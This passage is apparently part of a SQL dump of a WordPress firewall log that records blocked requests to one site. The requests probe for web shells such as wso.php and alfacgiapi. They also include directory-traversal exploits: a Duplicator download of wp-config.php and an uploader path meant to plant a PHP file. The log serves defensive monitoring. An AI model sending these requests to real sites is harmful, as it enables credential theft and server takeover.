User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NoZWxsLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11660,1674085285.563479,1674085285.224900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wso.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dzby5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11661,1674085284.819612,1674085284.052300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/xleet.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3hsZWV0LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11662,1674085283.654931,1674085282.622700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/olux.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L29sdXgucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11663,1674085282.226757,1674085281.338700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/index.php?3x=3x','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2luZGV4LnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11664,1674085280.941356,1674085280.348800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ubh/up.php','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy91YmgvdXAucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11665,1674085279.261092,1674085278.172400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11666,1674085277.164190,1674085276.130000,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11667,1674085275.192824,1674085274.294700,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/admin/controller/extension/extension/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L2FkbWluL2NvbnRyb2xsZXIvZXh0ZW5zaW9uL2V4dGVuc2lvbi9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11668,1674085273.321058,1674085272.912800,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11669,1674085271.978839,1674085271.507200,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11670,1674085270.520166,1674085269.820900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/sites/default/files/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3NpdGVzL2RlZmF1bHQvZmlsZXMvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(11671,1674085268.876104,1674085267.957900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11672,1674085267.004446,1674085266.568600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11673,1674085265.637978,1674085265.095300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/templates/beez3/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3RlbXBsYXRlcy9iZWV6My9BTEZBX0RBVEE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11674,1674085264.015093,1674085263.434900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvY2dpYWxmYQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11675,1674085262.511958,1674085262.245400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvYWxmYWNnaWFwaQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11676,1674085261.046309,1674085260.559100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvQUxGQV9EQVRB\",\"category\":\"brute-force\",\"ssl\":1}'),(11677,1674085259.616655,1674085258.841100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11678,1674085257.908543,1674085256.884100,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11679,1674085255.945015,1674085255.164300,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-admin/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWFkbWluL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11680,1674085254.170627,1674085253.776600,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2NnaWFsZmE=\",\"category\":\"brute-force\",\"ssl\":1}'),(11681,1674085252.843285,1674085252.046900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL2FsZmFjZ2lhcGk=\",\"category\":\"brute-force\",\"ssl\":1}'),(11682,1674085250.976714,1674085249.813900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-includes/ALFA_DATA','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWluY2x1ZGVzL0FMRkFfREFUQQ==\",\"category\":\"brute-force\",\"ssl\":1}'),(11683,1674085248.883228,1674085248.143400,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/cgialfa','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9jZ2lhbGZh\",\"category\":\"brute-force\",\"ssl\":1}'),(11684,1674085247.198582,1674085246.299900,'\0\0\0\0\0\0\0\0\0\0���$N',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/uploads/alfacgiapi','www.bing.com','wp_is_mobile','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"d3BfaXNfbW9iaWxl\",\"path\":\"L3dwLWNvbnRlbnQvdXBsb2Fkcy9hbGZhY2dpYXBp\",\"category\":\"brute-force\",\"ssl\":1}'),(11685,1674095584.374215,1674095584.210700,'\0\0\0\0\0\0\0\0\0\0���+�#',0,403,0,0,0,'https://dailyjolly.co.uk/wp-admin/admin-ajax.php?action=duplicator_download&file=..%2Fwp-config.php',NULL,'Go-http-client/1.1','blocked:waf','Directory Traversal (Requesting wp-config.php)','{\"learningMode\":0,\"failedRules\":\"67\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1tmaWxlXQ==\",\"paramValue\":\"Li4vd3AtY29uZmlnLnBocA==\",\"path\":\"L3dwLWFkbWluL2FkbWluLWFqYXgucGhw\",\"category\":\"traversal\",\"ssl\":1}'),(11686,1674094423.534810,1674094423.322900,'\0\0\0\0\0\0\0\0\0\0����R\r',0,403,0,0,0,'https://www.dailyjolly.co.uk/index.php?option=com_b2jcontact&view=loader&type=uploader&owner=component&bid=1&qqfile=%2F..%2F..%2F..%2FRaiz0WorM_1674092839.php',NULL,'python-requests/2.23.0','blocked:waf','Directory Traversal','{\"learningMode\":0,\"failedRules\":\"12\",\"paramKey\":\"cmVxdWVzdC5xdWVyeVN0cmluZ1txcWZpbGVd\",\"paramValue\":\"Ly4uLy4uLy4uL1JhaXowV29yTV8xNjc0MDkyODM5LnBocA==\",\"path\":\"L2luZGV4LnBocA==\",\"category\":\"traversal\",\"ssl\":1}'),(11687,1674087089.589401,1674087089.368000,'\0\0\0\0\0\0\0\0\0\0��in',0,403,0,0,0,'https://www.dailyjolly.co.uk/site/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3NpdGUvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11688,1674087047.102009,1674087046.510300,'\0\0\0\0\0\0\0\0\0\0��in',0,403,0,0,0,'https://www.dailyjolly.co.uk/blog/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L2Jsb2cvd3AtY29tbWVudGluLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11689,1674087012.775391,1674087012.555400,'\0\0\0\0\0\0\0\0\0\0��in',0,403,0,0,0,'https://www.dailyjolly.co.uk/wordpress/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dvcmRwcmVzcy93cC1jb21tZW50aW4ucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11690,1674086958.123465,1674086957.926700,'\0\0\0\0\0\0\0\0\0\0��in',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwL3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11691,1674086878.498903,1674086878.258200,'\0\0\0\0\0\0\0\0\0\0��in',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-commentin.php?pass=f0aab4595a024d626315fb786dce8282','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbW1lbnRpbi5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11692,1674107053.534782,1674107053.395100,'\0\0\0\0\0\0\0\0\0\0��-��',0,403,0,0,0,'https://dailyjolly.co.uk/tmp/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"L3RtcC9saWNlbnNlLnR4dA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11693,1674118163.594772,1674118163.440900,'\0\0\0\0\0\0\0\0\0\0��rY��',0,403,0,0,0,'https://dailyjolly.co.uk/temp/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"L3RlbXAvbGljZW5zZS50eHQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11694,1674127635.471646,1674127633.782500,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11695,1674127626.171037,1674127624.508300,'\0\0\0\0\0\0\0\0\0\0�����',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11696,1674129487.279859,1674129487.071700,'\0\0\0\0\0\0\0\0\0\0��2`��',0,403,0,0,0,'https://dailyjolly.co.uk/shop/license.txt',NULL,'Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96aWxsYS81LjAgKFgxMTsgVWJ1bnR1OyBMaW51eCB4ODZfNjQ7IHJ2OjYyLjApIEdlY2tvLzIwMTAwMTAxIEZpcmVmb3gvNjIuMA==\",\"path\":\"L3Nob3AvbGljZW5zZS50eHQ=\",\"category\":\"brute-force\",\"ssl\":1}'),(11697,1674135858.933620,1674135858.772500,'\0\0\0\0\0\0\0\0\0\0���&�',0,403,0,0,0,'https://dailyjolly.co.uk/wp-content/plugins/wp-slimstat-ex/lib/ofc/php-ofc-library/ofc_upload_image.php',NULL,'ALittle Client','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"QUxpdHRsZSBDbGllbnQ=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cC1zbGltc3RhdC1leC9saWIvb2ZjL3BocC1vZmMtbGlicmFyeS9vZmNfdXBsb2FkX2ltYWdlLnBocA==\",\"category\":\"brute-force\",\"ssl\":1}'),(11698,1674142850.158865,1674142850.033600,'\0\0\0\0\0\0\0\0\0\0����%0',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/wpputty/wpputty.php',NULL,'Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy93cHB1dHR5L3dwcHV0dHkucGhw\",\"category\":\"brute-force\",\"ssl\":1}'),(11699,1674161662.081950,1674161661.967000,'\0\0\0\0\0\0\0\0\0\0��y�n',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious User-Agents','{\"learningMode\":0,\"failedRules\":\"307\",\"paramKey\":\"cmVxdWVzdC5oZWFkZXJzW1VzZXItQWdlbnRd\",\"paramValue\":\"TW96bGlsYS81LjAgKExpbnV4OyBBbmRyb2lkIDcuMDsgU00tRzg5MkEgQnVsaWQvTlJEOTBNOyB3dikgQXBwbGVXZWJLaXQvNTM3LjM2IChLSFRNTCwgbGlrZSBHZWNrbykgVmVyc2lvbi80LjAgQ2hyb21lLzYwLjAuMzExMi4xMDcgTW9ibGllIFNhZmFyaS81MzcuMzY=\",\"path\":\"L3dwLWNvbnRlbnQvcGx1Z2lucy9pb3B0aW1pemF0aW9uL0lPcHRpbWl6ZS5waHA=\",\"category\":\"brute-force\",\"ssl\":1}'),(11700,1674161659.626936,1674161659.497700,'\0\0\0\0\0\0\0\0\0\0��y�n',0,403,0,0,0,'https://www.dailyjolly.co.uk/wp-content/plugins/ioptimization/IOptimize.php?rchk=','www.google.com','Mozlila/5.0 (Linux; Android 7.0; SM-G892A Bulid/NRD90M; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/60.0.3112.107 Moblie Safari/537.36','blocked:waf','Known malicious 